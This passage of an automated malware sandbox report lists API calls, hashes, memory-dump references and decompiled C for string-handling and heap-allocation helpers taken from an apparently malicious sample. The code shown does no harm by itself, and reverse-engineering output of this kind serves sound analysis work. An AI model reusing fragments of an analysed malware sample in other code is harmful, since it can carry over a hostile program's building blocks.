                        • Opcode ID: 524c60021ca962799126eaae91a095278baf5a130ce9eba461c51c3811d6d5ba
                        • Instruction ID: c795425772d4481170a3156d10eee275040ecbde49d1507ff864223a7b335452
                        • Opcode Fuzzy Hash: 524c60021ca962799126eaae91a095278baf5a130ce9eba461c51c3811d6d5ba
                        • Instruction Fuzzy Hash: 0031F6323057619B8624DE5DDC8885FB3EAEFE5755730892FE555C3E90EB309C088BA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: _memmove
                        • String ID: invalid string position$string too long
                        • API String ID: 4104443479-4289949731
                        • Opcode ID: b7b5f162b90642889a6209c69e13d6a9297e776269b5f9f81b4d98c7deec6292
                        • Instruction ID: 6b489546f67fcc1e528ea1aaf8e65faa681cc96b19b8ea28819d814c21bc4a01
                        • Opcode Fuzzy Hash: b7b5f162b90642889a6209c69e13d6a9297e776269b5f9f81b4d98c7deec6292
                        • Instruction Fuzzy Hash: 5811BE312016809BD7348E9C9D90D1AB7FAEFE17157308D1FE59187E81DB61EC448BA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C54DDE3
                        • ___raise_securityfailure.LIBCMT ref: 6C54DECA
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: 8hQl
                        • API String ID: 3761405300-3048985772
                        • Opcode ID: ef53a2b7657f4b655895a3a78bb7472b7c98dd9402d7afc43a5d067174e2e70f
                        • Instruction ID: 309a96cdf358faca62b396b71d52472f38f5d85a840db38bbd76cbfcf8851ae1
                        • Opcode Fuzzy Hash: ef53a2b7657f4b655895a3a78bb7472b7c98dd9402d7afc43a5d067174e2e70f
                        • Instruction Fuzzy Hash: 9B2115B4600289DFEF00CF1DD9867A07BF8FB4A756F12412AE9098BBA0E7B15484CF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C540507
                          • Part of subcall function 6C543E01: _malloc.LIBCMT ref: 6C543E19
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                        • String ID: invalid string position$string too long
                        • API String ID: 657562460-4289949731
                        • Opcode ID: b4c67513bb4f64c3f1371a02bfb47edf8ad6f364b48eb7a164900fac0ccf0e54
                        • Instruction ID: 7db93f48d6cf20c6cfe000af4f046df2468a94e9eacf95f9d4b19c1418d6e885
                        • Opcode Fuzzy Hash: b4c67513bb4f64c3f1371a02bfb47edf8ad6f364b48eb7a164900fac0ccf0e54
                        • Instruction Fuzzy Hash: 6FD09B75701145866B1C45B44C159AF5194CBA031DF3489399627CAE91D725E8544157
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::exception::exception.LIBCMT ref: 6C54219D
                          • Part of subcall function 6C544920: std::exception::_Copy_str.LIBCMT ref: 6C544939
                        • __CxxThrowException@8.LIBCMT ref: 6C5421B2
                          • Part of subcall function 6C544A87: RaiseException.KERNEL32(?,00000000,?,?,00000000), ref: 6C544ADC
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                        • String ID: |'Ql
                        • API String ID: 757275642-3658207547
                        • Opcode ID: 0e9698cb43c8bea3b7929c31728d69c63b2cba2942c98ba2a553994ec8247d58
                        • Instruction ID: 0606890895c61653aa72ed7b41f8e311aa37effed93cf402e43c53eb2694b090
                        • Opcode Fuzzy Hash: 0e9698cb43c8bea3b7929c31728d69c63b2cba2942c98ba2a553994ec8247d58
                        • Instruction Fuzzy Hash: 69D06775C0020DBB8B04EFA5DC899CEBBBCEA48244F40C466A914A7A01E734A6488F94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E04772FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                        				intOrPtr* _v8;
                        				void* _t17;
                        				intOrPtr* _t22;
                        				void* _t27;
                        				char* _t30;
                        				void* _t33;
                        				void* _t34;
                        				void* _t36;
                        				void* _t37;
                        				void* _t39;
                        				int _t42;
                        
                        				_t17 = __eax;
                        				_t37 = 0;
                        				__imp__(_a4, _t33, _t36, _t27, __ecx);
                        				_t2 = _t17 + 1; // 0x1
                        				_t28 = _t2;
                        				_t34 = E04775C4E(_t2);
                        				if(_t34 != 0) {
                        					_t30 = E04775C4E(_t28);
                        					if(_t30 == 0) {
                        						E04772A03(_t34);
                        					} else {
                        						_t39 = _a4;
                        						_t22 = E047779AC(_t39);
                        						_v8 = _t22;
                        						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                        							_a4 = _t39;
                        						} else {
                        							_t26 = _t22 + 2;
                        							_a4 = _t22 + 2;
                        							_t22 = E047779AC(_t26);
                        							_v8 = _t22;
                        						}
                        						if(_t22 == 0) {
                        							__imp__(_t34, _a4);
                        							 *_t30 = 0x2f;
                        							 *((char*)(_t30 + 1)) = 0;
                        						} else {
                        							_t42 = _t22 - _a4;
                        							memcpy(_t34, _a4, _t42);
                        							 *((char*)(_t34 + _t42)) = 0;
                        							__imp__(_t30, _v8);
                        						}
                        						 *_a8 = _t34;
                        						_t37 = 1;
                        						 *_a12 = _t30;
                        					}
                        				}
                        				return _t37;
                        			}















                        APIs
                        • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,047756E5,00000000,00000000,00000000,050E9698,?,?,04773B82,?,050E9698), ref: 04773008
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                          • Part of subcall function 047779AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04773036,00000000,00000001,00000001,?,?,047756E5,00000000,00000000,00000000,050E9698), ref: 047779BA
                          • Part of subcall function 047779AC: StrChrA.SHLWAPI(?,0000003F,?,?,047756E5,00000000,00000000,00000000,050E9698,?,?,04773B82,?,050E9698,0000EA60,?), ref: 047779C4
                        • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047756E5,00000000,00000000,00000000,050E9698,?,?,04773B82), ref: 04773066
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 04773076
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 04773082
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                        • String ID:
                        • API String ID: 3767559652-0
                        • Opcode ID: 33efe1cf349fb10658b0a682dc6a14e4d8a801d1910a80340098f8d6f6c7f45c
                        • Instruction ID: b6ae26258e462d67da0f550130ac632341a92ae2048a77adf2143d26482586cb
                        • Opcode Fuzzy Hash: 33efe1cf349fb10658b0a682dc6a14e4d8a801d1910a80340098f8d6f6c7f45c
                        • Instruction Fuzzy Hash: 2D21D2B2600215BFDF215F75CC48EAA7FB9EF06284B858454FD049B311D735E900D7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E04774DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                        				void* _v8;
                        				void* _t18;
                        				int _t25;
                        				int _t29;
                        				int _t34;
                        
                        				_t29 = lstrlenW(_a4);
                        				_t25 = lstrlenW(_a8);
                        				_t18 = E04775C4E(_t25 + _t29 + _t25 + _t29 + 2);
                        				_v8 = _t18;
                        				if(_t18 != 0) {
                        					_t34 = _t29 + _t29;
                        					memcpy(_t18, _a4, _t34);
                        					_t10 = _t25 + 2; // 0x2
                        					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                        				}
                        				return _v8;
                        			}









                        APIs
                        • lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,050E932C,?,04774ABB,004F0053,050E932C,?,?,?,?,?,?,04771BD5), ref: 04774DD8
                        • lstrlenW.KERNEL32(04774ABB,?,04774ABB,004F0053,050E932C,?,?,?,?,?,?,04771BD5), ref: 04774DDF
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,04774ABB,004F0053,050E932C,?,?,?,?,?,?,04771BD5), ref: 04774DFF
                        • memcpy.NTDLL(73B769A0,04774ABB,00000002,00000000,004F0053,73B769A0,?,?,04774ABB,004F0053,050E932C), ref: 04774E12
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrlenmemcpy$AllocateHeap
                        • String ID:
                        • API String ID: 2411391700-0
                        • Opcode ID: eee8f5c202d9d50db50dddf3e0193d0406aa6be199b8d7ec64e935faf61b2057
                        • Instruction ID: 1b6ed82b1f4bbb7be5f62d443a13a23c034ba43162a85e1184b2f3f65803ecde
                        • Opcode Fuzzy Hash: eee8f5c202d9d50db50dddf3e0193d0406aa6be199b8d7ec64e935faf61b2057
                        • Instruction Fuzzy Hash: 6BF0FF76900119BFDF11DFA9CC48CDE7BACEF092587554466ED04D7201E771EA149BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • lstrlen.KERNEL32(050E887A,00000000,00000000,00000000,04776328,00000000), ref: 04772839
                        • lstrlen.KERNEL32(?), ref: 04772841
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        • lstrcpy.KERNEL32(00000000,050E887A), ref: 04772855
                        • lstrcat.KERNEL32(00000000,?), ref: 04772860
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                        • String ID:
                        • API String ID: 74227042-0
                        • Opcode ID: be5b34c06695523fa4be34c030bad7cfaa15050514fef4103729aa1970373a2f
                        • Instruction ID: 0ba2d2a71e5bc2fea1501df758d2565454b6b2abb053855d61589c5067db4e44
                        • Opcode Fuzzy Hash: be5b34c06695523fa4be34c030bad7cfaa15050514fef4103729aa1970373a2f
                        • Instruction Fuzzy Hash: 2EE092B39022226797115FA59C48CDFBBBCEF89651344481AFA00D3200C7289C05CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%